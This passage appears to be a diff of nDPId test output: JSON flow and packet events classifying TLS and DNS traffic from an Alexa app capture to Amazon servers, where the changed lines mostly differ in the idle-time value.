{"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":822,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976058103,"flow_last_seen":1490976058222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976058222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064328,"flow_last_seen":1490976064328,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976064328,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1490976064328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064328,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88S5AAEAGXAisECrYSBXOh6SkAbuyb6ZBAAAAAKAC\/\/8DBAAAAgQFtAQCCAoA9ldvAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976057977,"flow_last_seen":1490976057977,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976057977,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1490976057977,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976057977,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8quhAAEAGnAasECrYNF7ohrJ4AbvwDv4cAAAAAKAC\/\/9b6AAAAgQFtAQCCAoA9lT0AAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1490976058029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976058029,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9qRAAOcGqVU0XuiGrBAq2AG7snh1d2z38A7+HXASH\/7rbgAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1490976058030,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976058030,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoqulAAEAGnBmsECrYNF7ohrJ4AbvwDv4ddXds+FAQAVc14AAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976057977,"flow_last_seen":1490976058032,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976058032,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":806,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976057977,"flow_last_seen":1490976058082,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976058082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976058103,"flow_last_seen":1490976058103,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976058103,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1490976058103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976058103,"pkt":"AMDKkaPvePiC0\/vCCABFAAA87D9AAEAGJ+usECrYNu8YuoT5Abs\/ELk9AAAAAKAC\/\/9McwAAAgQFtAQCCAoA9lUCAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":815,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1490976058160,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976058160,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw5wBAAOcGhjU27xi6rBAq2AG7hPl2s2uGPxC5PnASH\/7cPAAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":816,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1490976058162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976058162,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7EBAAEAGJ\/6sECrYNu8YuoT5Abs\/ELk+drNrh1AQAVcmrgAA"} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":817,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976058103,"flow_last_seen":1490976058166,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976058166,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":822,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976058103,"flow_last_seen":1490976058222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976058222,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064328,"flow_last_seen":1490976064328,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976064328,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1490976064328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064328,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88S5AAEAGXAisECrYSBXOh6SkAbuyb6ZBAAAAAKAC\/\/8DBAAAAgQFtAQCCAoA9ldvAAAAAAEDAwg="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064333,"flow_last_seen":1490976064333,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976064333,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1490976064333,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064333,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WldAAEARM2CsECrYrBAqAa27ADUAKN4THgkBAAABAAAAAAAAA3d3dwZhbWF6b24DY29tAAABAAE="} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064333,"flow_last_seen":1490976064333,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976064333,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1490976064389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976064389,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwkwRAAOcGEz5IFc6HrBAq2AG7pKSpsxlXsm+mQnASH\/60aQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1490976064390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976064390,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8S9AAEAGXBusECrYSBXOh6SkAbuyb6ZCqbMZWFAQAVf+2gAA"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":849,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064328,"flow_last_seen":1490976064392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976064392,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1490976064389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976064389,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwkwRAAOcGEz5IFc6HrBAq2AG7pKSpsxlXsm+mQnASH\/60aQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1490976064390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976064390,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8S9AAEAGXBusECrYSBXOh6SkAbuyb6ZCqbMZWFAQAVf+2gAA"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":849,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064328,"flow_last_seen":1490976064392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976064392,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1490976064448,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1490976064448,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC91iFAAEARtxSsECoBrBAq2AA1rbsAqQ1IHgmBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAABFAAoDd3d3A2NkbsAQwCwABQABAAAAAwAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAAAEABDRV0djAQgABAAEAAAABAAQ0VdHFwEIAAQABAAAAAQAENFXRj8BCAAEAAQAAAAEABDRV0Xo="} 00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":850,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976064448,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.216"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":851,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064452,"flow_last_seen":1490976064452,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976064452,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1490976064452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064452,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8L2dAAEAGLj+sECrYNFXR2NSiAbtfxHgaAAAAAKAC\/\/9kOQAAAgQFtAQCCAoA9ld9AAAAAAEDAwg="} -00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976064328,"flow_last_seen":1490976064454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976064454,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1490976064505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064505,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71KJ+bVwJX8R4G6AScSBROQAAAgQFtAQCCAptHVo6APZXfQEDAwg="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1490976064519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976064519,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0L2hAAEAGLkasECrYNFXR2NSiAbtfxHgbfm1cCoAQAVfvyQAAAQEICgD2V4NtHVo6"} -00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976064452,"flow_last_seen":1490976064520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976064520,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976064452,"flow_last_seen":1490976064578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1490976064578,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":851,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976064452,"flow_last_seen":1490976064452,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976064452,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1490976064452,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064452,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8L2dAAEAGLj+sECrYNFXR2NSiAbtfxHgaAAAAAKAC\/\/9kOQAAAgQFtAQCCAoA9ld9AAAAAAEDAwg="} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976064328,"flow_last_seen":1490976064454,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976064454,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1490976064505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976064505,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71KJ+bVwJX8R4G6AScSBROQAAAgQFtAQCCAptHVo6APZXfQEDAwg="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1490976064519,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976064519,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0L2hAAEAGLkasECrYNFXR2NSiAbtfxHgbfm1cCoAQAVfvyQAAAQEICgD2V4NtHVo6"} 